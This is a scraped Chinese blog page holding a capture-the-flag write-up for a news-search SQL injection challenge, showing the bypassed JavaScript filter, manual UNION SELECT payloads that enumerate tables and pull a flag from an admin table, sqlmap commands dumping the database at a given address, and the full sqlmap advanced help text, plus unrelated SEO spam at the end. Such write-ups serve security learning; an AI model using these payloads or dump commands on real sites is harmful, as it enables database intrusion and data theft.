白云新闻搜索-学习笔记

118 篇文章 14 订阅
订阅专栏

题目描述

中国又出现了一个搜索巨头!据报道,中国网络大亨小明近日编写了一个搜索引擎,叫白云新闻搜索,具体链接在下方,该搜索链接功能欠打,界面乏力,小明出一包辣条悬赏漏洞,豪言入侵高手都去试试,你服不服?不服就去试试呗~(答案为flag{}形式,提交{}中内容即可)

解题思路

首先拿到一个页面,是新闻搜索页面
搜索页
试着输入’:
特殊字符
查看源码,有前端表单过滤:

	function myFunction()
	{
		var x=document.getElementById("number").value;
    var a=document.getElementById("word").value;
    var b=a.replace(/[\ |\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\||\\|\[|\]|\{|\}|\;|\:|\"|\'|\,|\<|\.|\>|\/|\?|\·|\!|\(|\)|\¥|\——|\……|\【|\】|\、|\;|\:|\‘|\“|\”|\’|\,|\。|\、|\《|\》|\?|\ ]/g,"");
    if(a.length!=b.length)
    {
      alert("请输入正确字符。");
      document.getElementById("number").value = '';
      document.getElementById("word").value = '';
    }
    else if(isNaN(x))
    {
      alert("请输入数字。");
      document.getElementById("number").value = '';
    }

  }

把Javascript禁用掉:
禁用JS
测试有没有注入点,输入:' or 1=1 -- ', 能返回所有内容,说明有注入漏洞。
注入发现
查看表名:

' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables -- '

查看表名
查看字段

' union select 1,2,column_name from information_schema.columns -- '

字段
获取flag

' union select 1,2,flag from admin -- '

flag
sqlmap自动注入:

查看POST请求:
查看POST请求
查看数据库名:

sqlmap -u "http://183.129.189.60:10071/" --data="word=%E5%86%85%E5%AE%B9&number=5" --batch -p "word" --dbs

参数说明:

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--data=DATA         Data string to be sent through POST (e.g. "id=1")
--batch             Never ask for user input, use the default behavior
-p TESTPARAMETER    Testable parameter(s)
 --dbs               Enumerate DBMS databases

dbs

查看表名:

sqlmap -u "http://183.129.189.60:10071/" --data="word=%E5%86%85%E5%AE%B9&number=5" --batch -p "word" -D news --tables

参数说明:

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--data=DATA         Data string to be sent through POST (e.g. "id=1")
--batch             Never ask for user input, use the default behavior
-p TESTPARAMETER    Testable parameter(s)
-D DB               DBMS database to enumerate
--tables            Enumerate DBMS database tables

tables

sqlmap -u "http://183.129.189.60:10071/" --data="word=%E5%86%85%E5%AE%B9&number=5" --batch -p "word" -D news -T admin --dump

参数说明:

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--data=DATA         Data string to be sent through POST (e.g. "id=1")
--batch             Never ask for user input, use the default behavior
-p TESTPARAMETER    Testable parameter(s)
-D DB               DBMS database to enumerate
-T TBL              DBMS database table(s) to enumerate
--dump              Dump DBMS database table entries

查看flag

sqlmap帮助说明:

$sqlmap -hh
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.8#pip}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target URL

    -A AGENT, --user..  HTTP User-Agent header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --mobile            Imitate smartphone through HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Regular requests between visits to a safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --csrf-method=CS..  HTTP method to use during anti-CSRF token page visit
    --csrf-retries=C..  Retries for anti-CSRF token retrieval (default 0)
    --force-ssl         Force usage of SSL/HTTPS
    --chunked           Use HTTP chunked transfer encoded (POST) requests
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

  Optimization:
    These options can be used to optimize the performance of sqlmap

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --param-filter=P..  Select testable parameter(s) by place (e.g. "POST")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    --statements        Retrieve SQL statements being run on DBMS
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=SQLQ..  SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)

  Brute force:
    These options can be used to run brute force checks

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
    --common-files      Check existence of common files

  User-defined function injection:
    These options can be used to create custom user-defined functions

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management
    system underlying file system

    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters

    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --base64=BASE64P..  Parameter(s) containing Base64 encoded data
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp for filtering targets
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --table-prefix=T..  Prefix used for temporary tables (default: "sqlmap")
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")

  Miscellaneous:
    These options do not fit into any other category

    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --beep              Beep on question and/or when SQL injection is found
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --list-tampers      Display list of available tamper scripts
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --results-file=R..  Location of CSV results file in multiple targets mode
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --unstable          Adjust options for unstable connections
    --update            Update sqlmap
    --wizard            Simple wizard interface for beginner users

Press Enter to continue...
HTML学习笔记二(常用标签)
xbean1028的博客
03-31 173
HTML学习笔记二(常用标签) 文章目录列表标签无序列表(unordered list)有序列表(ordered list)定义列表(definition list)表格标签表格中的属性表格中的其它标签表格的结构表单标签form标签input标签数据列表多行文本框(文本域)下拉列表多媒体标签video标签audio标签详情和概要标签marquee标签HTML中被废弃的标签HTML实体meta其它类型eywords类型Descriiption类型Author类型Refresh类型Robots类型 列表标签 无
web笔记1.3
Zsj112330的博客
08-29 93
干货东西有点多慢慢看
CTF 刷题记录(一) 白云新闻搜索(手动与自动化SQL注入)
qq_29566629的博客
07-27 6063
题目 给出的靶机如下: 解题思路 首先判断这是考察哪个知识点,只有一个输入框,题目中又说到入侵,首先考虑sql注入,下面介绍手工和自动化注入两种方式 (1)手工注入 先随便输入几个值,发现只有在值等于“内容”时有返回结果,其他关键字均没有结果,但是会有会先如下: 用“ ’ ”来探测是否能接受特殊字符以及是否存在注入点,结果如图: 很显然,存在前台的js代码在控制输入的字符,找到这个网页的js代码,如下: 代码把所有的特殊字符都换成了空字符。 现在要做的就是就是先把这个网站的js代码停用,如下图:
信息安全实训周-第五天
最新发布
qq_68120942的博客
04-19 587
我们把鼠标放在“上传”选项上,链接发现有个url参数,可能存在文件包含,我们使用上传功能上传一个php文件,发现失败。包含文件时发现出错,查看具体原因发现是因为程序自身会在 后面加上.php,注意,在包含文件的时候%23表示#,如果 直接使用#,浏览器会不编码,且把#以后的字符当做锚点, 请求的时候不会带上#以后的字符。据报道中国网络大亨小明近日编写一个搜索引擎叫白新闻搜索,具体链接在下方,该搜索链接功能欠打,界面乏力,小明出一包辣条悬赏漏洞,豪言入侵高手都去试试,你服不服?但是你知道他的生日么?
CTF--白云新闻搜索
qq_70288605的博客
04-19 271
接着输入’ union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables – ’在网站输入英文 ' (英文单引号)符号,发现弹窗提示不允许输入特殊符号,因此我们可以禁用JavaScript,再浏览器设置里找到,并将该地址加入。然后构造下面的语句 ’ union select 1,2,flag from admin – ’测试是否能进行sql注入,输入永真式。发现存在flag关键字。
html 标签学习归纳笔记
Farewell_w的博客
02-26 704
文章目录一、标签【1】img 图片【2】from 表单 一、标签 【1】img 图片 <img src="图片地址" alt="下载失败时的替换文本" title = "提示文本"> src:标识图像的位置; alt:指定图像的描述性文本,当图像不可见时(下载不成功时),可看到该属性指定的文本; title:提供在图像可见时对图像的描述(鼠标滑过图片时显示的文本); 图像可以是GIF,...
Nuth | Hadoop完全分布式运行 学习笔记
键盘上舞动的青春
09-16 3765
原始URL: hdfs://10.66.27.18.:9000/user/hadoop/urldir  url.txt -->http://blog.tianya.cn hdfs://10.66.27.18.:9000/user/hadoop/urldir  url2.txt -->http://bbs.tianya.cn 直接生成:bin/nutch crawl urldir -dir c
web笔记day01
Serendipity_yuha的博客
09-20 49
总结
# 创业计划书-样例参考五千套(一)
热门推荐
Like_Bamboo的博客
12-07 4万+
创业计划书-%9C第五届“挑战杯”创业计划书(决赛版) 创业计划书-(大赛通知)关于对第三届中国“互联网+”大学生创新创业大赛“的实施方案_项目计划书知识图谱 创业计划书-(大赛章程)“创青春”全国大学生创业大赛章程 创业计划书-(对外)企业研究开发项目计划书–样本 创业计划书-(计划书模板)“创青春”创业大赛商业计划书模板_计划书模板 创业计划书-(评审规则)第二届中国“互联网+”大学生创新创业大赛全国总决赛评审规则 创业计划书-(评审规则)第三届中国“互联网+”大学生创新创业大赛全国总决赛评审规则 创业
【CS324】LLM(大模型的能力、数据、架构、分布式训练、微调等)
发现问题,并解决问题,批判性思维
09-12 1530
语言模型最初是在信息理论的背景下研究的,可以用来估计英语的熵。 熵用于度量概率分布:熵实际上是一个衡量将样本 � ∼ � x∼p 编码(即压缩)成比特串所需要的预期比特数的度量。举例来说,“the mouse ate the cheese” 可能会被编码成 “0001110101”。熵的值越小,表明序列的结构性越强,编码的长度就越短。直观地理解N-gram模型在计算上极其高效,但在统计上效率低下。 神经语言模型在统计上是高效的,但在计算上是低效的。 大模型的参数发展:随着深度学习在2010年代的兴起和主要硬
mybatis框架-学习笔记Day01.rar
03-26
学习笔记Day01》的相关代码文件本人博客文章《mybatis框架-学习笔记Day01》的相关代码文件本人博客文章《mybatis框架-学习笔记Day01》的相关代码文件本人博客文章《mybatis框架-学习笔记Day01》的相关代码文件本人...
javase-学习笔记.pdf
11-28
javase-学习笔记.pdf
C#高级编程-学习笔记.pdf
11-18
C#高级编程-学习笔记.pdf
Excel图表之道-学习笔记.ppt
11-15
Excel图表之道-学习笔记.ppt
Linux程序设计-学习笔记.doc
11-29
Linux程序设计-学习笔记.doc
Apache Log4j 漏洞(JNDI注入 CVE-2021-44228)
小龙在线
12-10 3万+
影响范围 2.0 <= Apache log4j <= 2.14.1 利用 import org.apache.log4j.Logger; import java.io.*; import java.sql.SQLException; import java.util.*; public class VulnerableLog4jExampleHandler implements HttpHandler { static Logger log = Logger.getLogger(l
小米9刷twrp并安装Magisk(面具)
小龙在线
06-18 2万+
小米9刷Magisk 手机必须先解锁BL锁才能继续: 小米官方BL解锁教程:查看链接 解完锁后开始操作: 1.手机下载magisk面具包备用: 链接: https://pan.baidu.com/s/12-hSjDpeXKbG9b5gS8N2lw 提取码: g85p 2.电脑端下载第三方W大的REC一键刷入线刷工具包 链接: https://pan.baidu.com/s/14rxiSnWURrTDiukpViYO3Q 提取码: 9gc4 电脑端下载REC一键刷入工具包 3.解压电脑下载的工具包.7z 4.
文件上传漏洞(一句话木马)-学习笔记
小龙在线
08-21 1万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
python画卡通白云
09-11
可以使用Python的图形库matplotlib来绘制卡通白云。首先,你需要安装matplotlib库,然后可以按照以下步骤进行绘制: ```python import matplotlib.pyplot as plt import numpy as np # 创建一个二维数组作为画布 canvas = np.zeros((10, 10)) # 绘制白云的轮廓 canvas[1:4, 3:7] = 1 canvas[2:3, 2:8] = 1 canvas[3:4, 1:9] = 1 # 使用imshow函数绘制图像 plt.imshow(canvas, cmap='Greys_r') # 隐藏坐标轴 plt.axis('off') # 显示绘制结果 plt.show() ``` 上述代码会在一个10x10的画布上绘制一个简单的白云形状。你可以根据自己的需求调整画布大小和白云形状。运行代码后,会弹出一个窗口显示绘制的白云图像。你还可以将图像保存到文件中,使用`plt.savefig('cloud.png')`命令即可保存为名为cloud.png的图片文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • Python 日期时间datetime 加一天,减一天,加减一小时一分钟,加减一年一月,时区转换、月初月末 229333
  • MySQL时间戳和时间的获取/相互转换/格式化 197107
  • JS删除DOM元素的两种方法 158245
  • Python获取文件路径、文件名和扩展名 69270
  • androidx.recyclerview:recyclerview的使用 54292

分类专栏

  • PyTorch 3篇
  • python 243篇
  • Go 45篇
  • 视频 6篇
  • C# 17篇
  • SpringBoot 6篇
  • Redis 1篇
  • aardio 1篇
  • Electron 4篇
  • 笔记 4篇
  • 安全实践 118篇
  • 正则表达式 4篇
  • IOS 2篇
  • 架构 8篇
  • 书法 2篇
  • JQuery 2篇
  • 采集 20篇
  • NLP 10篇
  • PHP 31篇
  • Java 30篇
  • elasticsearch 18篇
  • mysql 38篇
  • 前端 22篇
  • 读书 6篇
  • Linux 17篇
  • SEO 1篇
  • matplotlib 2篇
  • windows 25篇
  • 测试 19篇
  • nodejs 19篇
  • 数据库 30篇
  • javascript 28篇
  • shell 8篇
  • spark 9篇
  • c 20篇
  • 运维 30篇
  • Kafka 2篇
  • TensorFlow 23篇
  • 项目管理 18篇
  • selenium 6篇
  • 区块链 1篇
  • xpath 1篇
  • SSM 1篇
  • LaTeX 1篇
  • 编译原理 3篇
  • 算法 8篇
  • 设计模式 1篇
  • C++ 11篇
  • 计算机视觉 16篇
  • Android 65篇

最新评论

  • Ollama利用嵌入模型实现RAG应用

    qq_44162297: 为什么只需报错ollama._types.ResponseError

  • Python HTML实体转换(lxml tostring 乱码)

    lwlsyb66: etree.tostring()的with_tail=False有什么作用表情包

  • Ollama利用嵌入模型实现RAG应用

    学编程的小虎: 目前ollama只有嵌入模型才能实现RAG吗?

  • gorm时间格式化

    Lzq_1010: 试过更新创建时间怎么传值么

  • Python获取文件路径、文件名和扩展名

    qq_45915612: 这样换一下顺序的话就能拿到文件名了!谢谢博主! (path, filename) = os.path.split(url)#分割路径和文件 print(filename) print(path) (file, ext) = os.path.splitext(filename)#分割路径和扩展名 print(file) print(ext)

大家在看

  • [ROS报错问题]SystemError: initialization of cv_bridge_boost raised unreported exception
  • Easy IP + DNAT(服务器NAT转换) 1591
  • 建造者模式 950
  • 西瓜视频收益秘籍:单号轻松月入 1800+
  • 你如何看待GPT-4o?

最新文章

  • 基于docxtpl的模板生成Word
  • FlaUI
  • 基于pandarallel的Pandas并行操作
2024年28篇
2023年120篇
2022年136篇
2021年122篇
2020年144篇
2019年79篇
2018年162篇
2017年110篇
2010年1篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小龙在山东

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

PHP网站源码重庆网站搜索优化报价果洛营销网站价格南阳关键词排名包年推广多少钱双龙网站优化按天计费推荐淮北模板制作公司松原网站推广钦州阿里店铺运营多少钱来宾网站优化排名枣庄seo网站推广三明百搜标王公司济南网站搜索优化多少钱盐田建站观澜企业网站制作推荐福永营销网站哪家好海南seo网站优化价格长春优秀网站设计多少钱双龙建设网站报价红河百度关键词包年推广哪家好罗湖SEO按天扣费哪家好北海关键词排名哪家好萍乡SEO按天收费多少钱洛阳网页设计报价清徐建网站推荐松原优化推荐南昌网站关键词优化多少钱贵阳百度竞价哪家好怀化关键词按天计费推荐崇左SEO按天扣费鞍山网站seo优化楚雄百姓网标王公司歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

PHP网站源码 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化